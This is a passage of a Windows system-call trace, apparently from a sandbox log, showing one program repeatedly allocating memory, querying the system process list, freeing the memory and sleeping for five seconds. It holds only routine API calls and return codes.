Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.026] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.037] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.041] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.053] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.056] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.071] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.084] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.084] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.084] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.087] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.102] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.103] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.119] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.134] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.150] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.161] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.161] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.162] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.165] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.178] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.181] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.196] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.196] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.210] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.210] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.210] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.213] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.223] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.227] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.240] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.243] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.256] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.257] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.257] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.260] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.274] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.290] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.306] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.338] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.349] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.352] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0114.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0114.366] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0114.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0114.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0114.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0114.369] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0114.379] 